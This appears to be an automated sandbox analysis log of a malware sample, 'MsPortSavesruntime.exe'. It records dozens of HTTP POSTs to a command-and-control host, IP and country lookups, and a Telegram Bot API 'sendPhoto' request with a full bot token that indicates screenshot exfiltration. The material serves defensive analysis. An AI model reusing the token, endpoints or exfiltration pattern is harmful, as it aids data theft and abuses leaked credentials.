                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1000Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1692Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1704Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                                    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                                    Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                                    Source: global trafficDNS traffic detected: DNS query: windowsxp.top
                                    Source: unknownHTTP traffic detected: POST /bot2088971373:AAFvpTb_CUPp2OYxd9kBl53Xnu14PH8bMfQ/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="68d30593-7ba0-4754-ba4f-858b55a2ddb4"Host: api.telegram.orgContent-Length: 74846Expect: 100-continueConnection: Keep-Alive
                                    Source: MsPortSavesruntime.exe, 00000006.00000002.1989380503.0000000003ACE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                                    Source: powershell.exe, 00000024.00000002.3322433699.0000020A3D9D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                                    Source: powershell.exe, 00000024.00000002.3322433699.0000020A3D9D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                                    Source: powershell.exe, 00000026.00000002.3293568167.000001F91F630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                                    Source: powershell.exe, 00000028.00000002.3305345851.000001B441100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsQ
                                    Source: MsPortSavesruntime.exe, 00000006.00000002.2065833724.000000001C311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                                    Source: MsPortSavesruntime.exe, 00000006.00000002.1989380503.0000000003A07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io
                                    Source: powershell.exe, 00000022.00000002.3095391879.000002B0DFF30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3134224250.0000020A357D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3079926187.000001F91749A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3119918584.000001D12B756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                    Source: powershell.exe, 0000002A.00000002.2100432581.000001D11B908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 00000021.00000002.2098310464.000002002830A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2100588671.000002B0D0048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2105948485.0000020A25988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2099175495.000001F9075BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2097797897.000001B4290A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2100432581.000001D11B908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: MsPortSavesruntime.exe, 00000006.00000002.1989380503.000000000337E000.00000004.00000800.00020000.00000000.sdmp, MsPortSavesruntime.exe, 00000006.00000002.1989380503.00000000039EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2098310464.00000200280E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2100588671.000002B0CFE21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2105948485.0000020A25761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2099175495.000001F907391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2097797897.000001B428E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2100432581.000001D11B6E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 00000021.00000002.2098310464.000002002830A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2100588671.000002B0D0048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2105948485.0000020A25988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2099175495.000001F9075BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2097797897.000001B4290A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2100432581.000001D11B908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: powershell.exe, 0000002A.00000002.2100432581.000001D11B908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: powershell.exe, 00000024.00000002.3293225771.0000020A3D7A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                                    Source: powershell.exe, 00000021.00000002.2098310464.00000200280E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2100588671.000002B0CFE21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2105948485.0000020A25761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2099175495.000001F907391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2097797897.000001B428E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2100432581.000001D11B6E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                    Source: MsPortSavesruntime.exe, 00000006.00000002.1989380503.0000000003A86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegrP:o
                                    Source: MsPortSavesruntime.exe, 00000006.00000002.1989380503.0000000003768000.00000004.00000800.00020000.00000000.sdmp, MsPortSavesruntime.exe, 00000006.00000002.1989380503.0000000003A86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                                    Source: MsPortSavesruntime.exe, 00000006.00000002.1989380503.0000000003768000.00000004.00000800.00020000.00000000.sdmp, MsPortSavesruntime.exe, 00000006.00000002.1989380503.0000000003A86000.00000004.00000800.00020000.00000000.sdmp, MsPortSavesruntime.exe, 00000006.00000002.1980966579.00000000018D2000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                                    Source: MsPortSavesruntime.exe, 00000006.00000002.1989380503.0000000003768000.00000004.00000800.00020000.00000000.sdmp, MsPortSavesruntime.exe, 00000006.00000002.1989380503.0000000003A86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot2088971373:AAFvpTb_CUPp2OYxd9kBl53Xnu14PH8bMfQ/sendPhotoX
                                    Source: powershell.exe, 0000002A.00000002.3119918584.000001D12B756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                    Source: powershell.exe, 0000002A.00000002.3119918584.000001D12B756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                    Source: powershell.exe, 0000002A.00000002.3119918584.000001D12B756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                    Source: svchost.exe, 00000033.00000003.2102606497.000002092C313000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                                    Source: powershell.exe, 0000002A.00000002.2100432581.000001D11B908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                    Source: MsPortSavesruntime.exe, 00000006.00000002.1989380503.000000000337E000.00000004.00000800.00020000.00000000.sdmp, MsPortSavesruntime.exe, 00000006.00000002.1989380503.00000000039EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io
                                    Source: MsPortSavesruntime.exe, 00000006.00000002.1989380503.000000000337E000.00000004.00000800.00020000.00000000.sdmp, MsPortSavesruntime.exe, 00000006.00000002.1980966579.00000000018D2000.00000002.00000001.01000000.00000000.sdmp, MsPortSavesruntime.exe, 00000006.00000002.1989380503.00000000039EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/country
                                    Source: MsPortSavesruntime.exe, 00000006.00000002.1989380503.000000000337E000.00000004.00000800.00020000.00000000.sdmp, MsPortSavesruntime.exe, 00000006.00000002.1980966579.00000000018D2000.00000002.00000001.01000000.00000000.sdmp, MsPortSavesruntime.exe, 00000006.00000002.1989380503.00000000039EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip
                                    Source: powershell.exe, 00000021.00000002.3081134305.0000020038157000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3134224250.0000020A357D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.3058689357.000001B438EF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3119918584.000001D12B756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                                    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49736 version: TLS 1.2
